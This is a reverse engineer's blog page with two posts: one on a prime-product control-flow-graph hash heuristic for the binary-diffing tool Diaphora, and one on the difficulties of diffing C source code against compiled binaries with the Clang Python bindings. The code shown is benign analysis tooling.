<p>Joxean Koret's personal website about reverse engineering, vulnerability research, software development and even photography (sometimes).</p>
<h1>A new Control Flow Graph based heuristic for Diaphora</h1>
<p>Joxean Koret, 2018-11-04, <a href="http://joxeankoret.com/blog/2018/11/04/diaphora-new-heuristic">http://joxeankoret.com/blog/2018/11/04/diaphora-new-heuristic</a></p>
<p>Some weeks ago I decided to code a new heuristic based on one of the great ideas
that Huku, a researcher from Census Labs I met at a private event, proposes in
his paper <a href="https://census-labs.com/media/efficient-features-bindiff.pdf">Efficient Features for Function Matching between Binary Executables</a>.</p>
<h2 id="all-features-are-equal-but-some-features-are-more-equal-than-others">All features are equal, but some features are more equal than others</h2>
<p>In his paper, Huku proposes extracting features from the Control Flow Graphs (CFGs),
considering that each basic block (each node) can be special. He classifies basic
blocks into 7 categories: normal, entry points, exit points, traps, self-loops,
loop heads and loop tails. In the same way, he classifies edges into 4 kinds:
basis, forward, back edges and cross-links. There are various other good-looking
ideas in that paper, for example the instruction histograms,
which classify instructions into 4 categories based on their functionality
(arithmetic, logic, data transfer, redirection), but I haven’t implemented
anything based on those other ideas, for now.</p>
<h2 id="the-кока-algorithm">The КОКА algorithm</h2>
<p>The algorithm I have developed (КОКА, from Koret-Karamitas) builds on the idea
that “different basic blocks and edges are different interesting
pieces of information”. It is a new heuristic for Diaphora that gets
features at function, basic block, edge and instruction level, assigns a
different prime value to each different feature and then generates a hash by
just multiplying all the values (a small-primes-product, SPP). My algorithm
extracts the following features:</p>
<ul>
<li>For each basic block in each function, multiply a prime value assigned to
each different type of basic block (Huku considers 7
categories; I only consider 3: entry points, exit points and
“normal” nodes).</li>
<li>For each edge in each function, multiply a prime value assigned to each
different type of edge. In my case I only consider, for now, 2 different types
of edges; Huku considers 4.</li>
<li>For each instruction, multiply a prime value assigned to each instruction
that is considered. In my case I only consider a reduced number of types of
instructions: in-calls, out-calls and data references.</li>
<li>At function level, again, multiply a prime value assigned to each feature I
consider. In my case I consider the number of loops, the number of strongly
connected components, whether the function returns, whether it’s a library
function and whether it’s a thunk function.</li>
</ul>
<p>After these four steps, the final generated ‘hash’ is a large number: the
product of the various prime numbers assigned to the features of the
function. If you’re curious about why I decided not to add all the
different basic block and edge types that Huku mentions in his paper, it is
because, during my (very basic) testing, I noticed that some features (like loop
heads/tails) were causing mismatches for functions that are the same when
comparing binaries compiled for different architectures. Also, I didn’t
want to copy the algorithm but, rather, to create my own one based on his ideas.</p>
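<p>The small-primes-product idea described above can be sketched in a few lines of Python. This is only an illustration: the feature names and the primes assigned to them are made up for the example (the post only says there are two edge types, so they are called <code>edge_kind_1</code> and <code>edge_kind_2</code> here), and the real table is the one in Diaphora’s <code>graph_hashes.py</code>.</p>

```python
# Hypothetical feature names and primes, for illustration only; the real
# table lives in Diaphora's jkutils/graph_hashes.py.
FEATURE_PRIMES = {
    "bb_entry": 2, "bb_exit": 3, "bb_normal": 5,      # basic block types
    "edge_kind_1": 7, "edge_kind_2": 11,              # the two edge types
    "in_call": 13, "out_call": 17, "data_ref": 19,    # instruction level
    "loop": 23, "scc": 29, "returns": 31,             # function level
    "library": 37, "thunk": 41,
}


def spp_hash(features):
    """Return the product of the primes of every observed feature."""
    result = 1
    for name in features:
        result *= FEATURE_PRIMES[name]
    return result


# A tiny function: one entry block, one exit block, one outgoing call.
tiny = ["bb_entry", "bb_exit", "out_call", "returns"]
print(spp_hash(tiny))
```

<p>Because multiplication is commutative, the order in which features are discovered does not change the result, which is part of what makes the hash tolerant to small layout differences.</p>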
<h2 id="results-of-the-fuzzy-graph-hash">Results of the fuzzy graph hash</h2>
<p>The algorithm was designed to be somewhat ‘fuzzy’ but not too
fuzzy or, otherwise, it would cause too many false positives. Let’s run the
script calculating the hash against the ‘ls’ binary from Ubuntu 16.04 x86_64
(with SHA1 hash b79f70b18538de0199e6829e06b547e079df8842).
IDA 7.2 discovered 416 functions during its initial analysis. When run
against that binary, the script prints out the hash for each function in the
database and, at the end, shows the number of unique hashes it discovered. In
this example, it reports 141 unique hashes. It means that, for this
database, the hash unequivocally identifies 141 functions out of 416; that’s
33.89% of the functions with just one single heuristic. Let’s now see some
multi-matches, that is, hashes that match multiple functions. For example,
the hash 39278199524711331437958782332054597998538807300237778665425000000
matches the functions at addresses 0x00407b40 and 0x00407cd0. If we take a
look at their control flow graphs we will see that they are identical:</p>
<p><a href="/assets/img/diaphora-graph-hash-2-matches-same-graph.png"><img width="100%" src="/assets/img/diaphora-graph-hash-2-matches-same-graph.png" alt="Two different functions with the same CFG" /></a></p>
<p>As we can see, it’s pretty much the same function. The only difference is that
one calls <code class="language-plaintext highlighter-rouge">strcmp()</code> and the other calls a wrapper for <code class="language-plaintext highlighter-rouge">strcoll()</code>. The
hash I chose is rather ‘big’; let’s now try a smaller hash, for
example 8031387939300. It matches the functions at 0x00405120, 0x00405170,
0x0040f190, 0x0040f3c0 and 0x00413b9c. If we take a look at them we will see
small functions like the following ones:</p>
<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">B9C</span> <span class="nv">sub_413B9C</span> <span class="nv">proc</span> <span class="nv">near</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">B9C</span> <span class="c1">; __unwind {</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">B9C</span> <span class="nv">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nv">offset</span> <span class="nv">unk_61F360</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA1</span> <span class="nv">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="nv">offset</span> <span class="nv">_localtime_r</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA6</span> <span class="nv">jmp</span> <span class="nv">sub_413723</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA6</span> <span class="c1">; } // starts at 413B9C</span>
<span class="nl">.text:</span><span class="err">0000000000413</span><span class="nf">BA6</span> <span class="nv">sub_413B9C</span> <span class="nv">endp</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><span class="nl">.text:</span><span class="err">0000000000405120</span> <span class="nf">sub_405120</span> <span class="nv">proc</span> <span class="nv">near</span>
<span class="nl">.text:</span><span class="err">0000000000405120</span> <span class="c1">; __unwind {</span>
<span class="nl">.text:</span><span class="err">0000000000405120</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rsi</span><span class="p">]</span>
<span class="nl">.text:</span><span class="err">0000000000405123</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">]</span>
<span class="nl">.text:</span><span class="err">0000000000405126</span> <span class="nf">jmp</span> <span class="nv">_strcmp</span>
<span class="nl">.text:</span><span class="err">0000000000405126</span> <span class="c1">; } // starts at 405120</span>
<span class="nl">.text:</span><span class="err">0000000000405126</span> <span class="nf">sub_405120</span> <span class="nv">endp</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C0</span> <span class="nv">sub_40F3C0</span> <span class="nv">proc</span> <span class="nv">near</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C0</span> <span class="c1">; __unwind {</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C0</span> <span class="nv">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nv">offset</span> <span class="nv">unk_61E5A0</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3C5</span> <span class="nv">mov</span> <span class="nb">rdx</span><span class="p">,</span> <span class="mh">0FFFFFFFFFFFFFFFFh</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3CC</span> <span class="nv">jmp</span> <span class="nv">sub_40EAA0</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3CC</span> <span class="c1">; } // starts at 40F3C0</span>
<span class="nl">.text:</span><span class="err">000000000040</span><span class="nf">F3CC</span> <span class="nv">sub_40F3C0</span> <span class="nv">endp</span></code></pre></figure>
<p>As we can see, all the functions are pretty similar. There are differences in
what they do, of course, but in terms of the number of cross references, data references,
basic blocks, edges, calls, etc. they are equal, and detecting exactly that is this algorithm’s
sole purpose.</p>
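<p>Splitting the per-function hashes into unique hashes and multi-matches, as done in this section, can be sketched as follows. The function name <code>group_by_hash</code> is hypothetical, and the sample input mixes two addresses mentioned above with one made-up function (0x401000 with hash 30).</p>

```python
from collections import defaultdict


def group_by_hash(hashes):
    """Split {address: hash} into unique hashes and multi-matches."""
    groups = defaultdict(list)
    for address, value in hashes.items():
        groups[value].append(address)
    # Hashes seen exactly once identify one function unequivocally.
    unique = {v: a[0] for v, a in groups.items() if len(a) == 1}
    # Every other hash is shared by several functions.
    shared = {v: sorted(a) for v, a in groups.items() if len(a) != 1}
    return unique, shared


sample = {
    0x405120: 8031387939300,
    0x405170: 8031387939300,
    0x401000: 30,  # made-up function, not from the 'ls' binary
}
unique, shared = group_by_hash(sample)
print(len(unique), "unique hash(es),", len(shared), "multi-match(es)")
```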
<h2 id="the-new-heuristic">The new heuristic</h2>
<p>As previously mentioned, I’ve added a new heuristic to Diaphora based on the
output of this algorithm. As with MD-Indices, only hashes that are ‘rare enough’
are considered. It turns out that the reliability of the matches discovered by
this hash is very high and, as such, the results of the heuristic ‘Same rare КОКА
Hash’ are always assigned to either the “Best” or “Partial” tabs. Partial
matches come with a high similarity ratio, usually something higher than
0.98, which is very, very high. Most of the time, though, as shown in the picture
below, such matches are ‘perfect’ ones:</p>
<p><a href="/assets/img/same-rare-spp-graph-hash-chooser-best.png"><img src="/assets/img/same-rare-spp-graph-hash-chooser-best.png" width="100%" alt="A set of 'Best matches' found using the 'Same rare КОКА Hash'" /></a></p>
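<p>To give an idea of what a ‘same rare hash’ heuristic does, here is a minimal sketch. It assumes that ‘rare enough’ means “the hash appears exactly once in each database”, which is a simplification chosen for the example and not necessarily the threshold Diaphora applies; the function name and the sample addresses are hypothetical too.</p>

```python
from collections import Counter


def match_rare_hashes(primary, secondary):
    """Pair functions whose hash appears exactly once in both databases.

    Both arguments map a function address to its hash.
    """
    count1 = Counter(primary.values())
    count2 = Counter(secondary.values())
    by_hash2 = {h: addr for addr, h in secondary.items()}
    matches = []
    for addr1 in sorted(primary):
        h = primary[addr1]
        # Counter returns 0 for hashes missing from the other database.
        if count1[h] == 1 and count2[h] == 1:
            matches.append((addr1, by_hash2[h]))
    return matches


old = {0x1000: 30, 0x2000: 8031387939300, 0x3000: 8031387939300, 0x4000: 77}
new = {0x5000: 30, 0x6000: 8031387939300, 0x7000: 99}
for a, b in match_rare_hashes(old, new):
    print("0x%08x matches 0x%08x" % (a, b))
```

<p>Hashes shared by several small functions, like the thunk-like ones shown earlier, are skipped on purpose: they cannot tell those functions apart.</p>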
<h2 id="the-independent-library">The independent library</h2>
<p>While this heuristic has been created with the idea of using it in Diaphora, it
can be used half-independently. You just need to put the
scripts <code class="language-plaintext highlighter-rouge">graph_hashes.py</code> and <code class="language-plaintext highlighter-rouge">tarjan_sort.py</code> from Diaphora in the same folder or,
alternatively, copy the directories <code class="language-plaintext highlighter-rouge">jkutils</code> and <code class="language-plaintext highlighter-rouge">others</code> to the
directory where your script will reside. Either way, you can then use
this algorithm independently for your own tasks by writing an IDA Python script
similar to the following one:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">idaapi</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c1"># Functions() is provided by idautils; import it explicitly
</span><span class="kn">from</span> <span class="nn">idautils</span> <span class="kn">import</span> <span class="n">Functions</span>
<span class="c1"># Remove the "jkutils." part if you just copied graph_hashes.py &amp; tarjan_sort.py
</span><span class="kn">from</span> <span class="nn">jkutils.graph_hashes</span> <span class="kn">import</span> <span class="n">CKoretKaramitasHash</span>

<span class="c1"># Print the hash of every function in the current IDA database
</span><span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">Functions</span><span class="p">():</span>
  <span class="n">hasher</span> <span class="o">=</span> <span class="n">CKoretKaramitasHash</span><span class="p">()</span>
  <span class="n">final_hash</span> <span class="o">=</span> <span class="n">hasher</span><span class="p">.</span><span class="n">calculate</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"0x%08x: %s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">final_hash</span><span class="p">)))</span></code></pre></figure>
<h2 id="porting-the-algorithm-and-final-remarks">Porting the algorithm and final remarks.</h2>
<p>The code for this CFG hashing algorithm has been pushed to
<a href="https://github.com/joxeankoret/diaphora">Diaphora’s GitHub repository</a> and is
now available <a href="https://github.com/joxeankoret/diaphora/blob/master/jkutils/graph_hashes.py">here</a>.</p>
<p>The algorithm is rather easy to port to other reverse engineering frameworks
like <a href="https://binary.ninja/">Binary Ninja</a> or <a href="http://rada.re">Radare2</a> but, for now, it’s left as an exercise for
the reader. It would be very cool to have it working in Radare2 to, for
example, cluster and index malware with only open source tools. Perhaps it
could be a great new feature for <a href="https://github.com/joxeankoret/cosa-nostra">Cosa Nostra</a> and <a href="https://github.com/joxeankoret/maltindex">MalTindex</a>.</p>
<p>And… that’s all! I hope you like both this blog post and the new heuristic,
and don’t forget to check Huku’s paper!</p>
<h1>Histories of comparing binaries with source codes</h1>
<p>Joxean Koret, 2018-08-12, <a href="http://joxeankoret.com/blog/2018/08/12/histories-of-comparing-binaries-with-source-codes">http://joxeankoret.com/blog/2018/08/12/histories-of-comparing-binaries-with-source-codes</a></p>
<p>Hi all!</p>
<p>Some months ago I started designing and writing a tool to do a <em>simple</em> thing: directly diff source code against binaries. In the next paragraphs I will explain some of the problems I have discovered, how I managed to solve some of them and why I believe others are almost impossible to fix, as well as the current status of this tool.<!--more--></p>
<p><strong>Introduction: How I had the idea</strong></p>
<p>(If you’re not interested in why I decided to write such a tool, you can skip to the next section. If you’re just interested in having early access to the tool or knowing when it is going to be released, skip to the “ETA WEN?” section.)</p>
<p>I had this idea several years ago, when I had to reverse engineer a piece of software that I will not name: diff source code against binaries without having to build the source code, open the resulting binaries in IDA and diff both databases. At the time, after unpacking and deobfuscating the target and manually fixing some things here and there, I had an IDA database that I could work with. However, I had thousands of functions to analyse. Searching the internet, I noticed that there was a leak of partial source code from more than 10 years before. So, I downloaded that leak, unpacked the archive and tried to compile it so I could diff my target’s IDA database against the binary or binaries from the old leak. It was almost impossible to compile it. Surprise. The reasons were various:</p>
<ol>
<li>The compilers supported for building that code base dated from more than 10 years ago.</li>
<li>There were various headers and libraries required for the compilation or linking phases that I didn’t have, as the leak was partial.</li>
<li>Even if I could somehow compile portions of the old source code, I would only be able to import symbols from those files that I managed to compile.
<ol>
<li>Naturally, those source code files were the least complex and least important ones.</li>
</ol>
</li>
</ol>
<p>What I did in that case was to match some functions from the source files I managed to build to the functions in my target’s binary and, then, manually follow code references to rename things. And at this point I said to myself: “This is stupid, I should automate it somehow”. So, I wrote down the idea in my never-ending TODO list and decided that, some day, I would start working on it. It took me a few years to start this project.</p>
<p><strong>Diffing source codes to binaries</strong></p>
<p>When I started this project I already had an idea about how to write “diffing tools”, after writing and maintaining <a href="http://diaphora.re/">Diaphora</a> for several years, but comparing binaries against binaries or sources against sources is kind of easy, while comparing binaries against source code is not. In any case, I had the basic idea of how I should do this:</p>
<ol>
<li>Parse source codes and extract artifacts from source codes.</li>
<li>Analyse IDA databases and extract from binaries the very same artifacts extracted from source codes.</li>
<li>Develop heuristics to match functions in source codes to functions in binaries using the extracted artifacts.</li>
<li>Finally, let the reverse engineer import matched functions, prototypes, enumerations and structures from the source codes to the binary.</li>
</ol>
<p>And, basically, this is all this project does. But each step, especially dealing with source codes, has its own problems that are far from being trivial ones.</p>
<p><strong>Parsing source codes</strong></p>
<p>Parsing source code is far from being a solved problem. Yes, of course, parsers for many languages do exist out there. Yes, of course, one can easily write a parser for some programming languages. But supporting one dialect of one programming language is not the same as having to support all the dialects of the programming languages that you want to support. For example: let’s say that you want to support C and C++ source code. You will have to support, at the very least, the syntax accepted by the 3 major compilers: GCC, CLang and Microsoft Visual C++, which happen to be incompatible in some cases, especially when talking about Microsoft Visual C++. So, what can you do? You have 2 or 3 choices:</p>
<ol>
<li>Write a full parser (and either fail at doing so or never be done and hate yourself for years to come).</li>
<li>Write a fuzzy parser (this is what <a href="http://mlsec.org/joern/">“Joern”</a>, the tool written by Fabian Yamaguchi, does). It has most of the same problems as before but with fewer rules, as your parser doesn’t need to be a full-blown parser.</li>
<li>Use an existing compiler front-end instead of reinventing the wheel.</li>
</ol>
<p>And this is what I did: use an existing compiler front-end. There aren’t too many options to choose from when talking about C and C++ source codes:</p>
<ol>
<li>Use <a href="https://github.com/eliben/pycparser">PyCParser</a> or some similarly rather basic parser. It might work for a quick prototype, but do not plan to use it ever for a real tool.</li>
<li>Use <a href="https://gccxml.github.io/HTML/Index.html">GCCXML</a> or something around GCC that you code yourself (don’t do that unless you like suffering).</li>
<li>Use the CLang bindings. There are APIs and bindings for C, C++ and Python. It will support whatever CLang supports and it will not support whatever CLang doesn’t support.</li>
<li>If you have a rich uncle in America or if you are at a University, use the Edison Design Group C/C++ front-end. The EDG C/C++ front-end is, without a doubt, the best front-end out there. They support almost any compiler’s dialect, specific versions and even specific version bugs! Actually, many commercial compilers are just forks of EDG, like AIX xlC/C++ compilers or the Intel C++ compiler.</li>
</ol>
<p>My first option was to try to get an open source license for the EDG front-end but after exchanging some e-mails nothing materialized. So, my only other viable choice was to use CLang. I decided to use the Python bindings so I could reuse code from Diaphora. Perhaps it wasn’t a great choice and I should have used the C/C++ APIs… but it doesn’t really matter.</p>
<p><strong>Using the CLang Python Bindings</strong></p>
<p>The CLang Python bindings are great for parsing C, C++ and Objective-C source code. And what is even better: you don’t need to have fully compilable source code. The bindings will “swallow” almost anything they can understand. Especially with C source code, they will parse many source files and functions even when headers, for example, cannot be found. Of course, some functions will have no artifacts as they failed to compile/parse, but at least the bindings don’t refuse to continue compiling/parsing other functions in the same source file, which lets me get artifacts from partial source code. Just what I want.</p>
<p>The following is an example of partial source codes that cannot be completely parsed (from the testing suite of the tool I’m writing) that shows how the CLang’s Python bindings deal with them:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include &lt;stdio.h&gt;
</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">g_something</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">__attribute__</span><span class="p">((</span><span class="n">always_inline</span><span class="p">))</span> <span class="n">foo</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Hello!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// This function will fail to compile as the compiler doesn't know what</span>
<span class="c1">// is invalid_type_t</span>
<span class="n">invalid_type_t</span> <span class="nf">failing_func</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"I failez!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="kr">__inline</span> <span class="nf">set_something</span><span class="p">(</span><span class="kt">int</span> <span class="n">kk</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">copy</span> <span class="o">=</span> <span class="n">kk</span><span class="p">;</span>
  <span class="n">g_something</span> <span class="o">=</span> <span class="n">copy</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we try to compile this file with CLang or any other compiler it will fail, naturally. But if we “parse” it with the CLang Python bindings, it will not completely fail. I will use the <a href="https://pastebin.com/PaUcpqZM">following Python script</a> to compile the testing C file and print out the Abstract Syntax Tree (AST) that the bindings use:</p>
<pre>
$ ./dump_ast.py test.c ""
test.c:18,1: <strong>error</strong>: unknown type name 'invalid_type_t'
CursorKind.TRANSLATION_UNIT 'test.c' '#'
(...)
CursorKind.FUNCTION_DECL INLINED? False '<strong>int failing_func</strong>()' 'invalid_type_t'
CursorKind.COMPOUND_STMT '' '{'
CursorKind.CALL_EXPR 'printf' 'printf'
CursorKind.UNEXPOSED_EXPR 'printf' 'printf'
CursorKind.DECL_REF_EXPR 'printf' 'printf'
CursorKind.UNEXPOSED_EXPR '' '"I failez!\\n"'
CursorKind.UNEXPOSED_EXPR '' '"I failez!\\n"'
CursorKind.STRING_LITERAL '"I failez!\\n"' '"I failez!\\n"'
(...)
</pre>
<p>As we can see, the bindings continued parsing the function even though the type invalid_type_t cannot be resolved, and we can still extract artifacts from this function, like the function called (printf) or the string constant used (“I failez!\n”). This is all I want for this project: an AST I can use to extract ‘things’ even if the source code cannot be compiled to an object file because there are missing dependencies.</p>
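<p>For readers who want to reproduce this kind of dump, here is a minimal sketch of an AST walker. It is not the script linked above: the names <code>walk</code> and <code>dump_ast</code> are hypothetical, the output format is simpler, and it assumes the <code>clang.cindex</code> module from the libclang Python bindings is installed. The walker itself only relies on the cursor attributes <code>kind</code>, <code>spelling</code> and <code>get_children()</code>.</p>

```python
def walk(cursor, depth=0):
    """Yield (depth, kind, spelling) for a cursor and all its descendants."""
    yield depth, str(cursor.kind), cursor.spelling
    for child in cursor.get_children():
        yield from walk(child, depth + 1)


def dump_ast(path, args=()):
    """Parse `path` with libclang and print diagnostics plus the AST."""
    # Imported here so that walk() stays usable without libclang installed.
    from clang.cindex import Index

    tu = Index.create().parse(path, args=list(args))
    # Errors are reported as diagnostics; parsing still continues.
    for diag in tu.diagnostics:
        print("diagnostic:", diag.spelling)
    for depth, kind, spelling in walk(tu.cursor):
        print("  " * depth + kind, repr(spelling))
```

<p>Calling <code>dump_ast("test.c")</code> on the file above should report the unknown type as a diagnostic and still list the cursors found inside <code>failing_func</code>.</p>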
<p>And, now, we can move to the next step…</p>
<p><strong>Extracting artifacts</strong></p>
<p>After being able to deal with source codes (using the CLang Python bindings) and with binaries (using the IDA Python APIs) the next step is to extract artifacts from both binaries and source codes so we can later on use these artifacts for matching a function F in the source code to a function F’ in the binary. But, what artifacts can we extract? One of my first ideas was to extract ASTs from both source codes and binaries (by using the Hex-Rays decompiler) to perform a fuzzy comparison of both. It turned out to be a stupid idea. Why? I think it needs a whole new section to explain it…</p>
<p><strong>Comparing ASTs from binaries and source codes</strong></p>
<p>So, why was it a bad idea? Because the AST of a human-written function and the AST generated by an optimizing decompiler from optimized, compiler-generated code are totally different. I will explain it in more detail: when a source file gets compiled, the compiler front-end takes the source code and generates an AST, then the compiler translates the function to some sort of Intermediate Representation (IR), then it performs optimizations over the IR and, then, the compiler back-end generates the final code based on the optimized IR. Then, when we use the decompiler, it takes the output of the compiler, which is already optimized, performs various analyses of the function and its basic blocks, generates an IR based on the compiler-generated assembly code, performs optimizations over the IR and, finally, outputs pseudo-code. After these 2 steps, neither of which preserves information, whatever the programmer wrote is mostly lost at the AST level. It can be easily seen with a picture:</p>
<p><a href="/wp-content/uploads/2018/08/src_ast_to_bin_ast-1.png" rel="attachment wp-att-51949">
<img src="/wp-content/uploads/2018/08/src_ast_to_bin_ast-1.png" alt="To the left, the source of a C function. To the right, the decompiler generated pseudo-code." /></a></p>
<p class="wp-caption-text">
To the left, the source of a C function. To the right, the decompiler generated pseudo-code.
</p>
<p>This picture shows the source code of a buggy C function (resembling an <a href="https://www.securityfocus.com/archive/1/428183/30/0/threaded">old privilege escalation bug in X11</a>) and the generated pseudo-code. As we can see, the function geteuid is not called; rather, its address is compared to zero. The compiler noticed it, may or may not have generated a warning and, finally, removed the comparison from the binary as it knew beforehand that the address of geteuid would never be zero. Then, the decompiler takes whatever the compiler generated, does its job, and generates pseudo-code that, naturally, doesn’t reference the geteuid function, doesn’t include the printf(“Only root!\n”) call, etc…</p>
<p>This was just a trivial example of why a direct comparison of C code’s ASTs with pseudo-code’s ASTs is really a bad idea. So, when I realized I am stupid and that it wouldn’t work, I started thinking about other artifacts I could use for comparison.</p>
<p><strong>Finding the appropriate artifacts for comparison</strong></p>
<p>Believe it or not, this might very well be one of the hardest parts of this project: deciding what to extract to get a series of matches that I can trust. From my experience with Diaphora, I decided to try graph-related heuristics again. As with the AST idea, it turned out to be yet another stupid idea (except for call graph related heuristics). Let’s say that, for example, we want to use the Control Flow Graphs (CFGs). As with ASTs, CFGs built from human-written code are totally different from the CFGs we get after the compiler generates its output. It gets even worse when we consider that various different optimization levels can be applied. As such, after a brief analysis of the data (and writing a quick CFG builder from ASTs that I had to drop), I decided that I couldn’t use pretty much any of the heuristics I use in Diaphora, except the most rudimentary ones, like the number of conditionals, string and numeric constants, switch cases or the number of loops. These were the first “things” I started to extract for comparison. And it turned out that with these 4 easy-to-extract artifacts, I could get some initial matches. But what I think is more important: some initial matches <strong>with almost zero false positives</strong>!</p>
<p>The reasons behind why these artifacts are good for comparison are the following:</p>
<ul>
<li>A compiler might decide to apply constant folding, but it will not remove the constants unless they only appear in a dead code path.</li>
<li>If a source code function contains a loop whose condition is not impossible and that is not in a dead code path, the compiler will generate a loop in most cases (the compiler might unroll the loop if it’s possible, but it will not happen in 100% of the cases).</li>
<li>The number and values of the cases of a switch statement should be the same in both the binary and the source code if there aren’t impossible conditions, values or paths.</li>
<li>Usually, the number of conditionals for small to medium functions doesn’t change, or it changes only slightly.</li>
</ul>
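<p>The reasoning above can be turned into a simple candidate filter. The sketch below is only an illustration under assumptions of my choosing: the <code>Artifacts</code> record, the <code>is_candidate</code> function and the tolerance of one conditional are all hypothetical, and a real tool would tune these rules against actual data.</p>

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Artifacts:
    conditionals: int
    loops: int
    switch_cases: tuple = ()
    constants: frozenset = frozenset()


def is_candidate(src, binary, conditional_slack=1):
    """Decide whether a source and a binary function may be the same one."""
    # Switch case values should survive compilation unchanged.
    if src.switch_cases != binary.switch_cases:
        return False
    # Constants are folded but rarely removed: require some overlap.
    if src.constants and not (src.constants & binary.constants):
        return False
    # Unrolling can remove loops (assumption: it never adds them).
    if binary.loops > src.loops:
        return False
    # The number of conditionals only changes slightly.
    return abs(src.conditionals - binary.conditionals) <= conditional_slack


src = Artifacts(3, 1, (1, 2, 3), frozenset({"Hello!", 4096}))
compiled = Artifacts(4, 1, (1, 2, 3), frozenset({"Hello!", 4096, 7}))
print(is_candidate(src, compiled))
```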
<p>And, when I had my first initial matches with almost no false positives, I started writing an IDA Python based GUI so I could graphically see the matches.</p>
<p><strong>Blind Visual Diffing</strong></p>
<p>The next funny problem I found was the following: once I have a match and I show it in some sort of IDA GUI list (a chooser), how can I visually diff both functions? The answer is easy if we have a decompiler: we “just” diff the source code with the generated pseudo-code and that’s it. Well, it usually doesn’t quite work, as shown in the following picture:</p>
<p><a href="/wp-content/uploads/2018/08/diffing_src_to_pseudo.png" rel="attachment wp-att-51966"><img src="/wp-content/uploads/2018/08/diffing_src_to_pseudo.png" alt="Diffing source codes against pseudo-codes." /></a></p>
<p class="wp-caption-text">
Diffing source codes against pseudo-codes.
</p>
<p>But, even if it works (and it doesn’t in too many cases), how can we visually diff when the decompiler doesn’t support the processor architecture of our target? It doesn’t make any sense to show a diff of, say, PPC assembler and C source code. This is one of the various problems for which I have no solution. Perhaps one kind of solution would be to display a list of the artifacts that matched instead of source code, but it will probably not be enough information to decide whether the match is good or not.</p>
<p><strong>Comparing apples to oranges</strong></p>
<p>Another of the biggest problems I have had with this project is a common problem with diffing suites. Actually, I first experienced this problem with Diaphora. Once I have a match, how can I determine how reliable it is? It means writing a comparison function that takes as input a source code function’s extracted artifacts and a binary function’s extracted artifacts and outputs a ratio. It might sound easy but… how can I determine how close a C function is to a binary’s assembler function? In Diaphora, one of the ways of comparing 2 functions is to check whether their assembly or pseudo-code representations are similar. However, in this case I cannot do that for 2 reasons:</p>
<ol>
<li>I cannot directly compare assembler and source codes.</li>
<li>In most of the cases, the number of differences comparing source codes with pseudo-codes is huge even for a 100% reliable match (like in the previous picture).</li>
</ol>
<p>How did I solve it? I haven’t. Or I have only solved it partially: I assigned weights to each heuristic I have. However, I haven’t used any “scientific” approach to determine the weights. What I have used is manual analysis. Actually, this is another problem I have: how to automate the process of finding the proper weights for each heuristic. But this is a problem for another time…</p>
<p><strong>I heard you like problems…</strong></p>
<p>Another problem, another one I’m still dealing with, is how to properly import structures, enumerations and other pieces of interesting information from source codes to binaries. For example, let’s say that we have a good match and we want to import all relevant information from the source code to the binary. Now, consider the following good match:</p>
<p><a href="/wp-content/uploads/2018/08/busybox_do_sethostname_diff.png" rel="attachment wp-att-51986"><img src="/wp-content/uploads/2018/08/busybox_do_sethostname_diff.png" alt="A match between the source code and the binary Busybox function do_sethostname()." /></a></p>
<p class="wp-caption-text">
A match between the source code and the binary Busybox function do_sethostname().
</p>
<p>As we can see in the source code version, there is a variable of type parser_t and, naturally, we would like to import the parser_t struct’s definition into our IDA database. First of all, we don’t know where it is; we have to find it. So, what do we do? We check the include files. First problem: the current version of the Clang bindings doesn’t let you get a list of the included files. OK, then the solution is another one: gather that information from all the included files while parsing the source code files. It’s possible, but it means that for each and every source file we also have to parse all the include files (even the standard ones), making the parsing process really slow. Let’s say that we manage to do it only once, somehow, and we find the definition of parser_t. Now, let’s say that the struct contains other structures: we have to find them too. Once we have resolved all of them, we have to import them into IDA. It means having to create a dependency tree for the structs, so if struct A uses struct B and struct B uses struct C, we need to import first struct C, then struct B and finally struct A. In any case, that is more a programming problem than a real reverse engineering problem.</p>
